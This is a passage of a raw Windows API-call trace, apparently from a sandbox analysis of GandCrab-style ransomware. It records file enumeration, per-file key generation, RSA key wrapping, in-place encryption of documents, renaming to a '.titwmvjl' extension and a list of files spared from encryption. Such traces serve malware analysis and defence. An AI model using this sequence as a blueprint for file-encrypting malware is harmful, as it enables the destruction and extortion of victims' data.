"c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\fv1mcundf-l\\c548wj5bdz2qdcdtdvr.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x248 [0090.389] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.389] ReadFile (in: hFile=0x248, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e4f8, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259e4f8*=0x21c, lpOverlapped=0x0) returned 1 [0090.390] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.390] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.390] CryptAcquireContextW (in: phProv=0x259e428, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e428*=0x4c9980) returned 1 [0090.391] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.391] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.391] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.391] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e4b4 | out: pbBuffer=0x259e4b4) returned 1 [0090.391] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.391] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.391] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.392] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.392] CryptAcquireContextW (in: phProv=0x259e428, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e428*=0x4c9980) returned 1 [0090.393] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.393] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.393] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.393] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e4d4 | out: pbBuffer=0x259e4d4) returned 1 [0090.393] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.393] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.393] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.393] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.394] CryptAcquireContextW (in: phProv=0x259e41c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e41c*=0x4c9980) returned 1 [0090.395] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.395] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e420 | out: phKey=0x259e420*=0x503778) returned 1 [0090.395] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.395] CryptGetKeyParam (in: hKey=0x503778, dwParam=0x8, pbData=0x259e414, pdwDataLen=0x259e418, dwFlags=0x0 | out: pbData=0x259e414*=0x800, pdwDataLen=0x259e418*=0x4) returned 1 [0090.395] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.395] CryptEncrypt (in: hKey=0x503778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e44c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e44c*=0x100) returned 1 [0090.395] GetLastError () returned 0x0 [0090.396] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.396] CryptDestroyKey (hKey=0x503778) returned 1 [0090.396] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.396] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.396] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.396] CryptAcquireContextW (in: phProv=0x259e41c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e41c*=0x4c9980) returned 1 [0090.397] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.397] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e420 | out: phKey=0x259e420*=0x503778) returned 1 [0090.397] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.397] CryptGetKeyParam (in: hKey=0x503778, dwParam=0x8, pbData=0x259e414, pdwDataLen=0x259e418, dwFlags=0x0 | out: pbData=0x259e414*=0x800, pdwDataLen=0x259e418*=0x4) returned 1 [0090.397] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.397] CryptEncrypt (in: hKey=0x503778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e44c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e44c*=0x100) returned 1 [0090.398] GetLastError () returned 0x0 [0090.398] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.398] CryptDestroyKey (hKey=0x503778) returned 1 [0090.398] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.398] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.398] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0090.398] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0090.398] ReadFile (in: hFile=0x248, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e4f8, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e4f8*=0xa5d4, lpOverlapped=0x0) returned 1 [0090.405] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0xffff5a2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.405] WriteFile (in: hFile=0x248, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xa5d4, lpNumberOfBytesWritten=0x259e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e4dc*=0xa5d4, lpOverlapped=0x0) returned 1 [0090.406] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.406] WriteFile (in: hFile=0x248, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259e4dc*=0x21c, lpOverlapped=0x0) returned 1 [0090.407] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.410] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.411] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.411] CloseHandle (hObject=0x248) returned 1 [0090.411] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\c548WJ5bDz2QDCDTDVr.ods" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\fv1mcundf-l\\c548wj5bdz2qdcdtdvr.ods"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\c548WJ5bDz2QDCDTDVr.ods.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\fv1mcundf-l\\c548wj5bdz2qdcdtdvr.ods.titwmvjl"), dwFlags=0x1) returned 1 [0090.412] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.412] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0090.412] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0090.412] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0090.412] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\d2ca4a09d2ca4deb61a.lock" [0090.412] lstrlenW (lpString=".titwmvjl") returned 9 [0090.412] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\d2ca4a09d2ca4deb61a.lock") returned 133 [0090.412] VirtualAlloc (lpAddress=0x0, dwSize=0x14a, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.412] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 142 [0090.412] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\d2ca4a09d2ca4deb61a.lock") returned 133 [0090.412] lstrlenW (lpString=".lock") returned 5 [0090.412] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.413] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0090.413] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.413] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.413] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0090.413] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0090.413] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0090.413] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\TITWMVJL-DECRYPT.txt" [0090.413] lstrlenW (lpString=".titwmvjl") returned 9 [0090.413] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\TITWMVJL-DECRYPT.txt") returned 129 [0090.413] VirtualAlloc (lpAddress=0x0, dwSize=0x142, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.413] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 138 [0090.413] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\TITWMVJL-DECRYPT.txt") returned 129 [0090.413] lstrlenW (lpString=".txt") returned 4 [0090.413] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.413] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0090.414] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0090.414] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.414] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\TITWMVJL-DECRYPT.txt") returned 129 [0090.414] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\TITWMVJL-DECRYPT.txt") returned 129 [0090.414] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0090.414] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0090.414] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0090.414] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0090.414] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0090.414] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0090.414] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0090.414] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0090.414] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.414] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0090.414] lstrcmpW (lpString1="VOUJwwsAq6X.docx", lpString2=".") returned 1 [0090.414] lstrcmpW (lpString1="VOUJwwsAq6X.docx", lpString2="..") returned 1 [0090.414] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\", lpString2="VOUJwwsAq6X.docx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\VOUJwwsAq6X.docx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\VOUJwwsAq6X.docx" [0090.414] lstrlenW (lpString=".titwmvjl") returned 9 [0090.414] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\VOUJwwsAq6X.docx") returned 125 [0090.414] VirtualAlloc (lpAddress=0x0, dwSize=0x13a, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.414] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\VOUJwwsAq6X.docx.titwmvjl") returned 134 [0090.415] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\VOUJwwsAq6X.docx") returned 125 [0090.415] lstrlenW (lpString=".docx") returned 5 [0090.415] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.415] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".docx ") returned 6 [0090.415] lstrcmpiW (lpString1=".docx", lpString2=".titwmvjl") returned -1 [0090.415] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.415] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\VOUJwwsAq6X.docx") returned 125 [0090.415] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\VOUJwwsAq6X.docx") returned 125 [0090.415] lstrcmpiW (lpString1="VOUJwwsAq6X.docx", lpString2="desktop.ini") returned 1 [0090.415] lstrcmpiW (lpString1="VOUJwwsAq6X.docx", lpString2="autorun.inf") returned 1 [0090.415] lstrcmpiW (lpString1="VOUJwwsAq6X.docx", lpString2="ntuser.dat") returned 1 [0090.415] lstrcmpiW (lpString1="VOUJwwsAq6X.docx", lpString2="iconcache.db") returned 1 [0090.415] lstrcmpiW (lpString1="VOUJwwsAq6X.docx", lpString2="bootsect.bak") returned 1 [0090.415] lstrcmpiW (lpString1="VOUJwwsAq6X.docx", lpString2="boot.ini") returned 1 [0090.415] lstrcmpiW (lpString1="VOUJwwsAq6X.docx", lpString2="ntuser.dat.log") returned 1 [0090.415] lstrcmpiW (lpString1="VOUJwwsAq6X.docx", lpString2="thumbs.db") returned 1 [0090.415] lstrcmpiW (lpString1="VOUJwwsAq6X.docx", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0090.415] lstrcmpiW (lpString1="VOUJwwsAq6X.docx", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0090.415] lstrcmpiW (lpString1="VOUJwwsAq6X.docx", lpString2="KRAB-DECRYPT.html") returned 1 [0090.415] lstrcmpiW (lpString1="VOUJwwsAq6X.docx", lpString2="CRAB-DECRYPT.html") returned 1 [0090.415] lstrcmpiW (lpString1="VOUJwwsAq6X.docx", lpString2="KRAB-DECRYPT.txt") returned 1 [0090.415] lstrcmpiW (lpString1="VOUJwwsAq6X.docx", lpString2="CRAB-DECRYPT.txt") returned 1 [0090.415] lstrcmpiW (lpString1="VOUJwwsAq6X.docx", lpString2="ntldr") returned 1 [0090.415] lstrcmpiW (lpString1="VOUJwwsAq6X.docx", lpString2="NTDETECT.COM") returned 1 [0090.415] lstrcmpiW (lpString1="VOUJwwsAq6X.docx", lpString2="Bootfont.bin") returned 1 [0090.415] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\VOUJwwsAq6X.docx") returned 125 [0090.416] lstrlenW (lpString=".docx") returned 5 [0090.416] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.416] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".docx ") returned 6 [0090.416] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.416] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.416] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\VOUJwwsAq6X.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\fv1mcundf-l\\voujwwsaq6x.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x248 [0090.416] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.416] ReadFile (in: hFile=0x248, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e4f8, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259e4f8*=0x21c, lpOverlapped=0x0) returned 1 [0090.417] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.417] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.417] CryptAcquireContextW (in: phProv=0x259e428, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e428*=0x4c9980) returned 1 [0090.419] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.419] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.419] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.419] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e4b4 | out: pbBuffer=0x259e4b4) returned 1 [0090.419] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.419] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.419] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.420] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.420] CryptAcquireContextW (in: phProv=0x259e428, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e428*=0x4c9980) returned 1 [0090.421] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.421] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.421] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.421] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e4d4 | out: pbBuffer=0x259e4d4) returned 1 [0090.421] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.422] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.422] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.422] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.422] CryptAcquireContextW (in: phProv=0x259e41c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e41c*=0x4c9980) returned 1 [0090.423] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.424] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e420 | out: phKey=0x259e420*=0x503778) returned 1 [0090.424] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.424] CryptGetKeyParam (in: hKey=0x503778, dwParam=0x8, pbData=0x259e414, pdwDataLen=0x259e418, dwFlags=0x0 | out: pbData=0x259e414*=0x800, pdwDataLen=0x259e418*=0x4) returned 1 [0090.424] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.424] CryptEncrypt (in: hKey=0x503778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e44c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e44c*=0x100) returned 1 [0090.424] GetLastError () returned 0x0 [0090.424] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.424] CryptDestroyKey (hKey=0x503778) returned 1 [0090.424] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.425] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.425] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.425] CryptAcquireContextW (in: phProv=0x259e41c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e41c*=0x4c9980) returned 1 [0090.426] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.426] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e420 | out: phKey=0x259e420*=0x5033b8) returned 1 [0090.426] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.426] CryptGetKeyParam (in: hKey=0x5033b8, dwParam=0x8, pbData=0x259e414, pdwDataLen=0x259e418, dwFlags=0x0 | out: pbData=0x259e414*=0x800, pdwDataLen=0x259e418*=0x4) returned 1 [0090.426] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.426] CryptEncrypt (in: hKey=0x5033b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e44c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e44c*=0x100) returned 1 [0090.427] GetLastError () returned 0x0 [0090.427] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.427] CryptDestroyKey (hKey=0x5033b8) returned 1 [0090.427] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.427] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.427] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0090.427] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0090.427] ReadFile (in: hFile=0x248, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e4f8, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e4f8*=0x3e57, lpOverlapped=0x0) returned 1 [0090.433] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0xffffc1a9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.433] WriteFile (in: hFile=0x248, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x3e57, lpNumberOfBytesWritten=0x259e4dc, 